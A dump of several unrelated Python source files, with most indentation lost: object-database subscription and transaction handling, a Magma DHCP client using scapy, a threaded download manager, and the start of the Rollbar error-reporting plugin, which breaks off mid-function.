checkPending=False
)
self._markSubscriptionComplete(
msg.schema,
msg.typename,
msg.fieldname_and_value,
identities,
channel,
isLazy=False
)
channel.channel.write(
ServerToClient.SubscriptionComplete(
schema=msg.schema,
typename=msg.typename,
fieldname_and_value=msg.fieldname_and_value,
tid=self._cur_transaction_num
)
)
def _parseSubscriptionMsg(self, channel, msg):
schema_name = msg.schema
definition = channel.definedSchemas.get(schema_name)
assert definition is not None, "can't subscribe to a schema we don't know about!"
assert msg.typename is not None
typename = msg.typename
assert typename in definition, "Can't subscribe to a type we didn't define in the schema: %s not in %s" % (typename, list(definition))
typedef = definition[typename]
if msg.fieldname_and_value is None:
field, val = " exists", keymapping.index_value_to_hash(True)
else:
field, val = msg.fieldname_and_value
if field == '_identity':
identities = set([val])
else:
identities = set(self._kvstore.getSetMembers(keymapping.index_key_from_names_encoded(schema_name, typename, field, val)))
return typedef, identities
def handleSubscriptionOnBackgroundThread(self, connectedChannel, msg):
with Timer("Subscription requiring %s messages and produced %s objects for %s/%s/%s/isLazy=%s",
lambda: messageCount,
lambda: len(identities),
msg.schema,
msg.typename,
msg.fieldname_and_value,
msg.isLazy
):
try:
with self._lock:
typedef, identities = self._parseSubscriptionMsg(connectedChannel, msg)
if connectedChannel.channel not in self._clientChannels:
self._logger.warn("Ignoring subscription from dead channel.")
return
if msg.isLazy:
assert msg.fieldname_and_value is None or msg.fieldname_and_value[0] != '_identity', 'makes no sense to lazily subscribe to specific values!'
messageCount = 1
self._completeLazySubscription(
msg.schema, msg.typename, msg.fieldname_and_value,
typedef,
identities,
connectedChannel
)
return True
self._pendingSubscriptionRecheck = []
# we need to send everything we know about 'identities', keeping in mind that we have to
# check any new identities that get written to in the background to see if they belong
# in the new set
identities_left_to_send = set(identities)
messageCount = 0
while True:
locktime_start = time.time()
if self._subscriptionBackgroundThreadCallback:
self._subscriptionBackgroundThreadCallback(messageCount)
with self._lock:
messageCount += 1
if messageCount == 2:
self._logger.info(
"Beginning large subscription for %s/%s/%s",
msg.schema, msg.typename, msg.fieldname_and_value
)
self._sendPartialSubscription(
connectedChannel,
msg.schema,
msg.typename,
msg.fieldname_and_value,
typedef,
identities,
identities_left_to_send
)
self._pendingSubscriptionRecheck = []
if not identities_left_to_send:
self._markSubscriptionComplete(
msg.schema,
msg.typename,
msg.fieldname_and_value,
identities,
connectedChannel,
isLazy=False
)
connectedChannel.channel.write(
ServerToClient.SubscriptionComplete(
schema=msg.schema,
typename=msg.typename,
fieldname_and_value=msg.fieldname_and_value,
tid=self._cur_transaction_num
)
)
break
# don't hold the lock more than 75% of the time.
time.sleep( (time.time() - locktime_start) / 3 )
if self._subscriptionBackgroundThreadCallback:
self._subscriptionBackgroundThreadCallback("DONE")
finally:
with self._lock:
self._pendingSubscriptionRecheck = None
def _completeLazySubscription(self,
schema_name,
typename,
fieldname_and_value,
typedef,
identities,
connectedChannel
):
index_vals = self._buildIndexValueMap(typedef, schema_name, typename, identities)
connectedChannel.channel.write(
ServerToClient.LazySubscriptionData(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
identities=identities,
index_values=index_vals
)
)
# just send the identities
self._markSubscriptionComplete(
schema_name,
typename,
fieldname_and_value,
identities,
connectedChannel,
isLazy=True
)
connectedChannel.channel.write(
ServerToClient.SubscriptionComplete(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
tid=self._cur_transaction_num
)
)
def _buildIndexValueMap(self, typedef, schema_name, typename, identities):
# build a map from reverse-index-key to {identity}
index_vals = {}
for fieldname in typedef.indices:
keys = [keymapping.data_reverse_index_key(schema_name, typename, identity, fieldname)
for identity in identities]
vals = self._kvstore.getSeveral(keys)
for i in range(len(keys)):
index_vals[keys[i]] = vals[i]
return index_vals
def _markSubscriptionComplete(self, schema, typename, fieldname_and_value, identities, connectedChannel, isLazy):
if fieldname_and_value is not None:
# this is an index subscription
for ident in identities:
self._id_to_channel.setdefault(ident, set()).add(connectedChannel)
connectedChannel.subscribedIds.add(ident)
if fieldname_and_value[0] != '_identity':
index_key = keymapping.index_key_from_names_encoded(schema, typename, fieldname_and_value[0], fieldname_and_value[1])
self._index_to_channel.setdefault(index_key, set()).add(connectedChannel)
connectedChannel.subscribedIndexKeys[index_key] = -1 if not isLazy else self._cur_transaction_num
else:
# an object's identity cannot change, so we don't need to track our subscription to it
assert not isLazy
else:
# this is a type-subscription
if (schema, typename) not in self._type_to_channel:
self._type_to_channel[schema, typename] = set()
self._type_to_channel[schema, typename].add(connectedChannel)
connectedChannel.subscribedTypes[(schema, typename)] = -1 if not isLazy else self._cur_transaction_num
def _sendPartialSubscription(self,
connectedChannel,
schema_name,
typename,
fieldname_and_value,
typedef,
identities,
identities_left_to_send,
BATCH_SIZE=100,
checkPending=True):
# get some objects to send
kvs = {}
index_vals = {}
to_send = []
if checkPending:
for transactionMessage in self._pendingSubscriptionRecheck:
for key in transactionMessage.writes:
transactionMessage.writes[key]
# if we write to a key we've already sent, we'll need to resend it
identity = keymapping.split_data_key(key)[2]
if identity in identities:
identities_left_to_send.add(identity)
for add_index_key in transactionMessage.set_adds:
add_index_identities = transactionMessage.set_adds[add_index_key]
add_schema, add_typename, add_fieldname, add_hashVal = keymapping.split_index_key_full(add_index_key)
if add_schema == schema_name and add_typename == typename and (
fieldname_and_value is None and add_fieldname == " exists" or
fieldname_and_value is not None and tuple(fieldname_and_value) == (add_fieldname, add_hashVal)
):
identities_left_to_send.update(add_index_identities)
while identities_left_to_send and (BATCH_SIZE is None or len(to_send) < BATCH_SIZE):
to_send.append(identities_left_to_send.pop())
for fieldname in typedef.fields:
keys = [keymapping.data_key_from_names(schema_name, typename, identity, fieldname)
for identity in to_send]
vals = self._kvstore.getSeveral(keys)
for i in range(len(keys)):
kvs[keys[i]] = vals[i]
index_vals = self._buildIndexValueMap(typedef, schema_name, typename, to_send)
connectedChannel.channel.write(
ServerToClient.SubscriptionData(
schema=schema_name,
typename=typename,
fieldname_and_value=fieldname_and_value,
values=kvs,
index_values=index_vals,
identities=None if fieldname_and_value is None else tuple(to_send)
)
)
def onClientToServerMessage(self, connectedChannel, msg):
assert isinstance(msg, ClientToServer)
# Handle Authentication messages
if msg.matches.Authenticate:
if msg.token == self._auth_token:
connectedChannel.authenticate()
# else, do we need to do something?
return
# Abort if connection is not authenticated
if connectedChannel.needsAuthentication:
self._logger.info(
"Received unexpected client message on unauthenticated channel %s",
connectedChannel.connectionObject._identity
)
return
# Handle remaining types of messages
if msg.matches.Heartbeat:
connectedChannel.heartbeat()
elif msg.matches.LoadLazyObject:
with self._lock:
self._loadLazyObject(connectedChannel, msg)
if self._lazyLoadCallback:
self._lazyLoadCallback(msg.identity)
elif msg.matches.Flush:
with self._lock:
connectedChannel.channel.write(ServerToClient.FlushResponse(guid=msg.guid))
elif msg.matches.DefineSchema:
assert isinstance(msg.definition, SchemaDefinition)
connectedChannel.definedSchemas[msg.name] = msg.definition
elif msg.matches.Subscribe:
with self._lock:
self._handleSubscriptionInForeground(connectedChannel, msg)
elif msg.matches.TransactionData:
connectedChannel.handleTransactionData(msg)
elif msg.matches.CompleteTransaction:
try:
data = connectedChannel.extractTransactionData(msg.transaction_guid)
with self._lock:
isOK, badKey = self._handleNewTransaction(
connectedChannel,
data['writes'],
data['set_adds'],
data['set_removes'],
data['key_versions'],
data['index_versions'],
msg.as_of_version
)
except Exception:
self._logger.error("Unknown error committing transaction: %s", traceback.format_exc())
isOK = False
badKey = "<NONE>"
connectedChannel.sendTransactionSuccess(msg.transaction_guid, isOK, badKey)
def indexReverseLookupKvs(self, adds, removes):
res = {}
for indexKey, identities in removes.items():
schemaname, typename, fieldname, valuehash = keymapping.split_index_key_full(indexKey)
for ident in identities:
res[keymapping.data_reverse_index_key(schemaname, typename, ident, fieldname)] = None
for indexKey, identities in adds.items():
schemaname, typename, fieldname, valuehash = keymapping.split_index_key_full(indexKey)
for ident in identities:
res[keymapping.data_reverse_index_key(schemaname, typename, ident, fieldname)] = valuehash
return res
def _broadcastSubscriptionIncrease(self, channel, indexKey, newIds):
newIds = list(newIds)
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(indexKey)
channel.channel.write(
ServerToClient.SubscriptionIncrease(
schema=schema_name,
typename=typename,
fieldname_and_value=(fieldname, fieldval),
identities=newIds
)
)
def _loadValuesForObject(self, channel, schema_name, typename, identities):
typedef = channel.definedSchemas.get(schema_name)[typename]
valsToGet = []
for field_to_pull in typedef.fields:
for ident in identities:
valsToGet.append(keymapping.data_key_from_names(schema_name, typename, ident, field_to_pull))
results = self._kvstore.getSeveral(valsToGet)
return {valsToGet[i]: results[i] for i in range(len(valsToGet))}
def _increaseBroadcastTransactionToInclude(self, channel, indexKey, newIds, key_value, set_adds, set_removes):
# we need to include all the data for the objects in 'newIds' to the transaction
# that we're broadcasting
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(indexKey)
typedef = channel.definedSchemas.get(schema_name)[typename]
key_value.update(self._loadValuesForObject(channel, schema_name, typename, newIds))
reverseKeys = []
for index_name in typedef.indices:
for ident in newIds:
reverseKeys.append(keymapping.data_reverse_index_key(schema_name, typename, ident, index_name))
reverseVals = self._kvstore.getSeveral(reverseKeys)
reverseKVMap = {reverseKeys[i]: reverseVals[i] for i in range(len(reverseKeys))}
for index_name in typedef.indices:
for ident in newIds:
fieldval = reverseKVMap.get(keymapping.data_reverse_index_key(schema_name, typename, ident, index_name))
if fieldval is not None:
ik = keymapping.index_key_from_names_encoded(schema_name, typename, index_name, fieldval)
set_adds.setdefault(ik, set()).add(ident)
def _loadLazyObject(self, channel, msg):
channel.channel.write(
ServerToClient.LazyLoadResponse(
identity=msg.identity,
values=self._loadValuesForObject(channel, msg.schema, msg.typename, [msg.identity])
)
)
def _garbage_collect(self, intervalOverride=None):
"""Cleanup anything in '_version_numbers' where we have deleted the entry
and it's inactive for a long time."""
interval = intervalOverride or self._gc_interval
if self._last_garbage_collect_timestamp is None or time.time() - self._last_garbage_collect_timestamp > interval:
threshold = time.time() - interval
new_ts = {}
for key, ts in self._version_numbers_timestamps.items():
if ts < threshold:
if keymapping.isIndexKey(key):
if not self._kvstore.getSetMembers(key):
del self._version_numbers[key]
else:
if self._kvstore.get(key) is None:
del self._version_numbers[key]
else:
new_ts[key] = ts
self._version_numbers_timestamps = new_ts
self._last_garbage_collect_timestamp = time.time()
def _handleNewTransaction(self,
sourceChannel,
key_value,
set_adds,
set_removes,
keys_to_check_versions,
indices_to_check_versions,
as_of_version
):
"""Commit a transaction.
key_value: a map
db_key -> (json_representation, database_representation)
that we want to commit. We cache the normal_representation for later.
set_adds: a map:
db_key -> set of identities added to an index
set_removes: a map:
db_key -> set of identities removed from an index
"""
self._cur_transaction_num += 1
transaction_id = self._cur_transaction_num
assert transaction_id > as_of_version
t0 = time.time()
set_adds = {k: v for k, v in set_adds.items() if v}
set_removes = {k: v for k, v in set_removes.items() if v}
identities_mentioned = set()
keysWritingTo = set()
setsWritingTo = set()
schemaTypePairsWriting = set()
if sourceChannel:
# check if we created any new objects to which we are not type-subscribed
# and if so, ensure we are subscribed
for add_index, added_identities in set_adds.items():
schema_name, typename, fieldname, fieldval = keymapping.split_index_key_full(add_index)
if fieldname == ' exists':
if (schema_name, typename) not in sourceChannel.subscribedTypes:
sourceChannel.subscribedIds.update(added_identities)
for new_id in added_identities:
self._id_to_channel.setdefault(new_id, set()).add(sourceChannel)
self._broadcastSubscriptionIncrease(sourceChannel, add_index, added_identities)
for key in key_value:
keysWritingTo.add(key)
schema_name, typename, ident = keymapping.split_data_key(key)[:3]
schemaTypePairsWriting.add((schema_name, typename))
identities_mentioned.add(ident)
for subset in [set_adds, set_removes]:
for k in subset:
if subset[k]:
schema_name, typename = keymapping.split_index_key(k)[:2]
schemaTypePairsWriting.add((schema_name, typename))
setsWritingTo.add(k)
identities_mentioned.update(subset[k])
# check all version numbers for transaction conflicts.
for subset in [keys_to_check_versions, indices_to_check_versions]:
for key in subset:
last_tid = self._version_numbers.get(key, -1)
if as_of_version < last_tid:
return (False, key)
t1 = time.time()
for key in keysWritingTo:
self._version_numbers[key] = transaction_id
self._version_numbers_timestamps[key] = t1
for key in setsWritingTo:
self._version_numbers[key] = transaction_id
self._version_numbers_timestamps[key] = t1
priorValues = self._kvstore.getSeveralAsDictionary(key_value)
# set the json representation in the database
target_kvs = {k: v for k, v in key_value.items()}
target_kvs.update(self.indexReverseLookupKvs(set_adds, set_removes))
new_sets, dropped_sets = self._kvstore.setSeveral(target_kvs, set_adds, set_removes)
# update the metadata index
indexSetAdds = {}
indexSetRemoves = {}
for s in new_sets:
index_key, index_val = keymapping.split_index_key(s)
if index_key not in indexSetAdds:
indexSetAdds[index_key] = set()
indexSetAdds[index_key].add(index_val)
for s in dropped_sets:
index_key, index_val = keymapping.split_index_key(s)
if index_key not in indexSetRemoves:
indexSetRemoves[index_key] = set()
indexSetRemoves[index_key].add(index_val)
self._kvstore.setSeveral({}, indexSetAdds, indexSetRemoves)
t2 = time.time()
channelsTriggeredForPriors = set()
# check any index-level subscriptions that are going to increase as a result of this
# transaction and add the backing data to the relevant transaction.
for index_key, adds in list(set_adds.items()):
if index_key in self._index_to_channel:
idsToAddToTransaction = set()
for channel in self._index_to_channel.get(index_key):
if index_key in channel.subscribedIndexKeys and \
channel.subscribedIndexKeys[index_key] >= 0:
# this is a lazy subscription. We're not using the transaction ID yet because
# we don't store it on a per-object basis here. Instead, we're always sending
# everything twice to lazy subscribers.
channelsTriggeredForPriors.add(channel)
newIds = adds.difference(channel.subscribedIds)
for new_id in newIds:
self._id_to_channel.setdefault(new_id, set()).add(channel)
channel.subscribedIds.add(new_id)
self._broadcastSubscriptionIncrease(channel, index_key, newIds)
idsToAddToTransaction.update(newIds)
if idsToAddToTransaction:
self._increaseBroadcastTransactionToInclude(
channel, # deliberately just using whatever random channel, under
# the assumption they're all the same. it would be better
                                 # to explicitly compute the union of the relevant set of
                                 # defined fields, as it's possible one channel has more fields
# for a type than another and we'd like to broadcast them all
index_key, idsToAddToTransaction, key_value, set_adds, set_removes)
transaction_message = None
channelsTriggered = set()
for schema_type_pair in schemaTypePairsWriting:
for channel in self._type_to_channel.get(schema_type_pair, ()):
if channel.subscribedTypes[schema_type_pair] >= 0:
# this is a lazy subscription. We're not using the transaction ID yet because
# we don't store it on a per-object basis here. Instead, we're always sending
# everything twice to lazy subscribers.
channelsTriggeredForPriors.add(channel)
channelsTriggered.add(channel)
for i in identities_mentioned:
if i in self._id_to_channel:
channelsTriggered.update(self._id_to_channel[i])
for channel in channelsTriggeredForPriors:
lazy_message = ServerToClient.LazyTransactionPriors(writes=priorValues) # noqa
transaction_message = ServerToClient.Transaction(
writes={k: v for k, v in key_value.items()},
set_adds=set_adds,
set_removes=set_removes,
transaction_id=transaction_id
)
if self._pendingSubscriptionRecheck is not None:
self._pendingSubscriptionRecheck.append(transaction_message)
for channel in channelsTriggered:
channel.sendTransaction(transaction_message)
if self.verbose or time.time() - t0 > self.longTransactionThreshold:
self._logger.info(
"Transaction [%.2f/%.2f/%.2f] with %s writes, %s set ops: %s",
t1 - t0, t2 - t1, time.time() - t2,
len(key_value), len(set_adds) + len(set_removes), sorted(key_value)[:3]
)
self._garbage_collect()
return (True, None)
|
dhcp_client.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
import datetime
import logging
import threading
import time
from typing import Optional, MutableMapping
from ipaddress import IPv4Network, ip_address
from scapy.all import AsyncSniffer
from scapy.layers.dhcp import BOOTP, DHCP
from scapy.layers.l2 import Ether, Dot1Q
from scapy.layers.inet import IP, UDP
from scapy.sendrecv import sendp
from threading import Condition
from magma.mobilityd.mac import MacAddress, hex_to_mac
from magma.mobilityd.dhcp_desc import DHCPState, DHCPDescriptor
from magma.mobilityd.uplink_gw import UplinkGatewayInfo
LOG = logging.getLogger('mobilityd.dhcp.sniff')
DHCP_ACTIVE_STATES = [DHCPState.ACK, DHCPState.OFFER]
class DHCPClient:
THREAD_YIELD_TIME = .1
def __init__(self,
dhcp_store: MutableMapping[str, DHCPDescriptor],
gw_info: UplinkGatewayInfo,
dhcp_wait: Condition,
iface: str = "dhcp0",
lease_renew_wait_min: int = 200):
"""
        Implements a DHCP client that allocates an IP for a given MAC address.
        DHCP client state is maintained in a user-provided hash table.
        Args:
            dhcp_store: maintains DHCP transactions, keyed by MAC address.
            gw_info: stores GW IP info learned from the DHCP server
            dhcp_wait: notifies users on new DHCP packets
            iface: DHCP egress and ingress interface.
            lease_renew_wait_min: minimum wait (seconds) between renewal checks.
        """
self._sniffer = AsyncSniffer(iface=iface,
filter="udp and (port 67 or 68)",
prn=self._rx_dhcp_pkt)
self.dhcp_client_state = dhcp_store # mac => DHCP_State
self.dhcp_gw_info = gw_info
self._dhcp_notify = dhcp_wait
self._dhcp_interface = iface
self._msg_xid = 0
self._lease_renew_wait_min = lease_renew_wait_min
self._monitor_thread = threading.Thread(target=self._monitor_dhcp_state)
self._monitor_thread.daemon = True
self._monitor_thread_event = threading.Event()
def run(self):
"""
Start DHCP sniffer thread.
        This initializes the state required for the DHCP sniffer thread and starts it.
Returns: None
"""
self._sniffer.start()
LOG.info("DHCP sniffer started")
# give it time to schedule the thread and start sniffing.
time.sleep(self.THREAD_YIELD_TIME)
self._monitor_thread.start()
def stop(self):
self._sniffer.stop()
self._monitor_thread_event.set()
def send_dhcp_packet(self, mac: MacAddress, vlan: str,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
            mac: MAC address of the interface
            vlan: VLAN id of the request ("" or "0" when untagged)
            state: requested DHCP state (DISCOVER/REQUEST/RELEASE)
            dhcp_desc: current DHCP protocol state for this MAC
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan,
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac), state)
return
dhcp_opts.append("end")
dhcp_desc.xid = pkt_xid
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
if vlan and vlan != "0":
pkt /= Dot1Q(vlan=int(vlan))
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def get_dhcp_desc(self, mac: MacAddress, vlan: str) -> Optional[DHCPDescriptor]:
"""
Get DHCP description for given MAC.
Args:
mac: Mac address of the client
vlan: vlan id if the IP allocated in a VLAN
Returns: Current DHCP info.
"""
key = mac.as_redis_key(vlan)
if key in self.dhcp_client_state:
return self.dhcp_client_state[key]
LOG.debug("lookup error for %s", str(key))
return None
def release_ip_address(self, mac: MacAddress, vlan: str):
"""
Release DHCP allocated IP.
Args:
mac: MAC address of the IP allocated.
vlan: vlan id if the IP allocated in a VLAN
Returns: None
"""
key = mac.as_redis_key(vlan)
if key not in self.dhcp_client_state:
LOG.error("Unallocated DHCP release for MAC: %s", key)
return
dhcp_desc = self.dhcp_client_state[key]
self.send_dhcp_packet(mac, dhcp_desc.vlan, DHCPState.RELEASE, dhcp_desc)
def _monitor_dhcp_state(self):
"""
monitor DHCP client state.
"""
while True:
wait_time = self._lease_renew_wait_min
with self._dhcp_notify:
for dhcp_record in self.dhcp_client_state.values():
logging.debug("monitor: %s", dhcp_record)
# Only process active records.
if dhcp_record.state not in DHCP_ACTIVE_STATES:
continue
now = datetime.datetime.now()
logging.debug("monitor time: %s", now)
request_state = DHCPState.REQUEST
# in case of lost DHCP lease rediscover it.
if now >= dhcp_record.lease_expiration_time:
request_state = DHCPState.DISCOVER
if now >= dhcp_record.lease_renew_deadline:
logging.debug("sending lease renewal")
self.send_dhcp_packet(dhcp_record.mac, dhcp_record.vlan,
request_state, dhcp_record)
else:
# Find next renewal wait time.
time_to_renew = dhcp_record.lease_renew_deadline - now
wait_time = min(wait_time, time_to_renew.total_seconds())
                # never wait less than the configured minimum renewal interval
                wait_time = max(wait_time, self._lease_renew_wait_min)
logging.debug("lease renewal check after: %s sec" % wait_time)
self._monitor_thread_event.wait(wait_time)
if self._monitor_thread_event.is_set():
break
@staticmethod
def _get_option(packet, name):
for opt in packet[DHCP].options:
if opt[0] == name:
return opt[1]
return None
def _process_dhcp_pkt(self, packet, state: DHCPState):
LOG.debug("DHCP pkt recv %s", packet.show(dump=True))
mac_addr = MacAddress(hex_to_mac(packet[BOOTP].chaddr.hex()[0:12]))
vlan = ""
if Dot1Q in packet:
vlan = str(packet[Dot1Q].vlan)
mac_addr_key = mac_addr.as_redis_key(vlan)
with self._dhcp_notify:
if mac_addr_key in self.dhcp_client_state:
state_requested = self.dhcp_client_state[mac_addr_key].state_requested
ip_offered = packet[BOOTP].yiaddr
subnet_mask = self._get_option(packet, "subnet_mask")
if subnet_mask is not None:
ip_subnet = IPv4Network(ip_offered + "/" + subnet_mask, strict=False)
else:
ip_subnet = IPv4Network(ip_offered + "/" + "32", strict=False)
dhcp_router_opt = self._get_option(packet, "router")
if dhcp_router_opt is not None:
router_ip_addr = ip_address(dhcp_router_opt)
else:
router_ip_addr = None
lease_expiration_time = self._get_option(packet, "lease_time")
dhcp_state = DHCPDescriptor(mac=mac_addr,
ip=ip_offered,
state=state,
vlan=vlan,
state_requested=state_requested,
subnet=str(ip_subnet),
server_ip=packet[IP].src,
router_ip=router_ip_addr,
lease_expiration_time=lease_expiration_time,
xid=packet[BOOTP].xid)
LOG.info("Record DHCP for: %s state: %s", mac_addr_key, dhcp_state)
self.dhcp_client_state[mac_addr_key] = dhcp_state
self.dhcp_gw_info.update_ip(router_ip_addr, vlan)
self._dhcp_notify.notifyAll()
if state == DHCPState.OFFER:
# let other thread work on fulfilling IP allocation request.
threading.Event().wait(self.THREAD_YIELD_TIME)
self.send_dhcp_packet(mac_addr, vlan, DHCPState.REQUEST, dhcp_state)
else:
LOG.debug("Unknown MAC: %s " % packet.summary())
return
# ref: https://fossies.org/linux/scapy/scapy/layers/dhcp.py
def _rx_dhcp_pkt(self, packet):
if DHCP not in packet:
return
# Match DHCP offer
if packet[DHCP].options[0][1] == int(DHCPState.OFFER):
self._process_dhcp_pkt(packet, DHCPState.OFFER)
# Match DHCP ack
elif packet[DHCP].options[0][1] == int(DHCPState.ACK):
self._process_dhcp_pkt(packet, DHCPState.ACK)
# TODO handle other DHCP protocol events.
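# --- Illustrative sketch (not part of the original module) ----------------------
# The class docstring above says callers are notified of new DHCP packets via the
# shared Condition (dhcp_wait). A consumer could block on that Condition until an
# ACK is recorded for its MAC, along the lines below. `client`, `dhcp_wait`,
# `mac`, `vlan` and the timeout are placeholders supplied by the caller.
def wait_for_dhcp_ack(client, dhcp_wait: Condition, mac: MacAddress, vlan: str,
                      timeout: float = 10.0) -> Optional[DHCPDescriptor]:
    deadline = time.time() + timeout
    with dhcp_wait:
        while True:
            desc = client.get_dhcp_desc(mac, vlan)
            if desc is not None and desc.state == DHCPState.ACK:
                return desc
            remaining = deadline - time.time()
            if remaining <= 0:
                return None
            # released (and re-acquired) while waiting; _process_dhcp_pkt notifies
            dhcp_wait.wait(timeout=remaining)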
|
download_manager.py
|
# -*- coding: utf-8 -*-
import os
import time
from queue import Queue, Empty
from threading import Thread
from urllib.parse import urlparse
from tqdm import tqdm
from multidl.constants import DownloadState, STATE_TRANSITIONS
from multidl.downloaders import SCHEMES
from multidl.exceptions import TransitionError
class DownloadManager:
def __init__(self, urls, output_directory, nb_workers, **options):
self.output_directory = output_directory
self.nb_workers = min(nb_workers, len(urls))
self.options = options
self._urls = Queue()
self._state = DownloadState.not_started
self._download_handlers = []
# initialize the queue
for i, url in enumerate(urls):
self._urls.put((i, url))
self._download_handlers.append(DownloadHandler(url))
def log(self, *args, **kwargs):
if self.options.get('quiet'):
return
print(*args, **kwargs)
@staticmethod
def get_downloader(url):
parsed_url = urlparse(url)
for downloader in SCHEMES.get(parsed_url.scheme, []):
if downloader.can_handle_url(url):
return downloader
raise NotImplementedError('No downloader for {} urls'
.format(parsed_url.scheme))
@property
def state(self):
return self._state
@state.setter
def state(self, value):
current_state = self._state
if value not in STATE_TRANSITIONS[current_state]:
raise TransitionError(current_state, value)
self._state = value
def process(self):
self.state = DownloadState.started
try:
watcher = Thread(target=self.watcher)
watcher.start()
for _ in range(self.nb_workers):
t = Thread(target=self.worker)
t.start()
self._urls.join()
watcher.join()
except KeyboardInterrupt:
self.cancel()
def worker(self):
while True:
state = self.state
if state not in [DownloadState.paused, DownloadState.started]:
break
if state == DownloadState.paused:
time.sleep(0.1)
continue
try:
index, url = self._urls.get_nowait()
except Empty:
break
downloader = self.process_single_url(url)
if downloader:
self._download_handlers[index].downloader = downloader
downloader.start()
self._urls.task_done()
def process_single_url(self, url):
try:
downloader = self.get_downloader(url)
except NotImplementedError as e:
self.log('{}: skipping {}'.format(e, url))
return None
output = os.path.join(self.output_directory)
download_process = downloader(url, output)
return download_process
def watcher(self):
while True:
for download_handler in self._download_handlers:
download_handler.update_progress()
if not self._urls.unfinished_tasks:
break
time.sleep(1)
self.state = DownloadState.finished
tqdm.write('')
def pause(self):
self.state = DownloadState.pausing
for download_handler in self._download_handlers:
download_handler.pause()
self.state = DownloadState.paused
def resume(self):
self.state = DownloadState.resuming
for download_handler in self._download_handlers:
download_handler.resume()
self.state = DownloadState.started
def cancel(self):
self.state = DownloadState.canceling
for download_handler in self._download_handlers:
download_handler.cancel()
self.state = DownloadState.canceled
class DownloadHandler:
def __init__(self, url):
self.url = url
self.downloader = None
self.progress_bar = None
def update_progress(self):
if not self.downloader:
return
downloaded, total = self.downloader.get_progress()
if self.progress_bar is None:
bar_name = os.path.basename(self.downloader.output)
self.progress_bar = tqdm(
total=total, desc=bar_name, disable=False,
unit='b', unit_scale=True, unit_divisor=1024)
progress = downloaded - self.progress_bar.n
self.progress_bar.update(progress)
if self.downloader.state in [DownloadState.finished,
DownloadState.canceled,
DownloadState.error]:
self.progress_bar.close()
def pause(self):
self.downloader and self.downloader.pause()
def resume(self):
self.downloader and self.downloader.resume()
def cancel(self):
self.downloader and self.downloader.cancel()
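# --- Illustrative usage sketch (not part of the original module) ----------------
# Driving the manager from a script; the URLs and options below are placeholders.
# process() blocks until the queue is drained, and a KeyboardInterrupt cancels
# all downloads via cancel().
if __name__ == '__main__':
    manager = DownloadManager(
        ['https://example.com/a.bin', 'https://example.com/b.bin'],
        output_directory='.',
        nb_workers=2,
        quiet=False,
    )
    manager.process()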
|
__init__.py
|
"""
Plugin for Pyramid apps to submit errors to Rollbar
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import functools
import inspect
import json
import logging
import os
import socket
import sys
import threading
import time
import traceback
import types
import uuid
import wsgiref.util
import requests
import six
from rollbar.lib import events, filters, dict_merge, parse_qs, text, transport, urljoin, iteritems
__version__ = '0.14.5'
__log_name__ = 'rollbar'
log = logging.getLogger(__log_name__)
try:
# 2.x
import Queue as queue
except ImportError:
# 3.x
import queue
# import request objects from various frameworks, if available
try:
from webob import BaseRequest as WebobBaseRequest
except ImportError:
WebobBaseRequest = None
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
DjangoHttpRequest = None
RestFrameworkRequest = None
else:
try:
from django.http import HttpRequest as DjangoHttpRequest
except (ImportError, ImproperlyConfigured):
DjangoHttpRequest = None
try:
from rest_framework.request import Request as RestFrameworkRequest
except (ImportError, ImproperlyConfigured):
RestFrameworkRequest = None
del ImproperlyConfigured
try:
from werkzeug.wrappers import BaseRequest as WerkzeugRequest
except (ImportError, SyntaxError):
WerkzeugRequest = None
try:
from werkzeug.local import LocalProxy as WerkzeugLocalProxy
except (ImportError, SyntaxError):
WerkzeugLocalProxy = None
try:
from tornado.httpserver import HTTPRequest as TornadoRequest
except ImportError:
TornadoRequest = None
try:
from bottle import BaseRequest as BottleRequest
except ImportError:
BottleRequest = None
try:
from sanic.request import Request as SanicRequest
except ImportError:
SanicRequest = None
try:
from google.appengine.api.urlfetch import fetch as AppEngineFetch
except ImportError:
AppEngineFetch = None
def passthrough_decorator(func):
def wrap(*args, **kwargs):
return func(*args, **kwargs)
return wrap
try:
from tornado.httpclient import AsyncHTTPClient as TornadoAsyncHTTPClient
except ImportError:
TornadoAsyncHTTPClient = None
try:
import treq
from twisted.python import log as twisted_log
def log_handler(event):
"""
Default uncaught error handler
"""
try:
if not event.get('isError') or 'failure' not in event:
return
err = event['failure']
# Don't report Rollbar internal errors to ourselves
if issubclass(err.type, ApiException):
